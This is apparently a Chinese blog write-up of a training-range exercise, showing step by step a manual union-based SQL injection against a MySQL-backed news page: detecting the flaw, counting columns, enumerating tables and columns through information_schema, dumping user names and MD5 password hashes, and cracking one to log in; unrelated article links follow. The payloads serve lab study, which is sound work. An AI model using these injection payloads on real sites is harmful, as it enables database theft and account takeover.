MOZHE SQL手工注入漏洞测试(MySQL数据库)

主界面URL没有参数,无法判断是否有注入点

点击公告

【浏览器不便于查看返回包可以用burp】

测试URL

sql 复制代码
参数后加上单引号,报错,说明存在注入点
http://124.70.64.48:40021/new_list.php?id=1'

获取表列数

sql 复制代码
order by 4  返回200
order by 5  返回500
id 所在表有4列

爆显位

sql 复制代码
让id=-1,使前半段查询出错,让后半段查询结果显示出来
填充数字个数等于列刚才得到的列数
http://124.70.64.48:40021/new_list.php?id=-1%20union%20select%201,2,3,4

获取信息

XML 复制代码
在显位上查询以下信息:
version()                数据库版本5.7.22-0ubuntu0.16.04.1
user()                   用户root@localhost
@@version_compile_os     操作系统Linux
database()               数据库名字mozhe_Discuz_StormGroup

知道数据库名字,到information_schema里查数据库中的表

sql 复制代码
group_concat() 将结果连接起来,避免显示不完整
information_schema.tables记录了所有表的信息
information_schema.tables的table_schema列记录了表对应的数据库
information_schema.tables的table_name列记录了表名

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

该数据库有两个表StormGroup_member,notice

知道表名查列名

sql 复制代码
group_concat() 将结果连接起来,避免显示不完整
information_schema.columns记录了所有列的信息
information_schema.columns的table_name列记录了列对应的表
information_schema.columns的column_name列记录了列名

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

该数据库有列:id,name,password,status

知道列名查字段

sql 复制代码
union select 1,group_concat(name),group_concat(password),4 from mozhe_Discuz_StormGroup.StormGroup_member

name:mozhe,mozhe
password:356f589a7df439f6f744ff19bb8092c0,ae0af42ea5d582a11a9c994a96a2002e

密码为MD5加密,md5在线解密

第二个密码209883正确。(查看status列就知道,第一个账号status为0,登录不了)

成功登录,获取key

相关推荐
2501_916007472 分钟前
iOS 接口频繁请求导致流量激增?抓包分析定位与修复全流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_916013741 小时前
用Fiddler中文版抓包工具掌控微服务架构中的接口调试:联合Postman与Charles的高效实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
爱上语文1 小时前
Redis基础(4):Set类型和SortedSet类型
java·数据库·redis·后端
lifallen1 小时前
Paimon vs. HBase:全链路开销对比
java·大数据·数据结构·数据库·算法·flink·hbase
m0_694845571 小时前
服务器如何配置防火墙规则开放/关闭端口?
linux·服务器·安全·云计算
Brookty2 小时前
【MySQL】JDBC编程
java·数据库·后端·学习·mysql·jdbc
_代号0072 小时前
MySQL梳理一:整体架构概览
后端·mysql
mooyuan天天3 小时前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
先做个垃圾出来………3 小时前
SQL的底层逻辑解析
数据库·sql
00后程序员张3 小时前
调试 WebView 接口时间戳签名问题:一次精细化排查和修复过程
websocket·网络协议·tcp/ip·http·网络安全·https·udp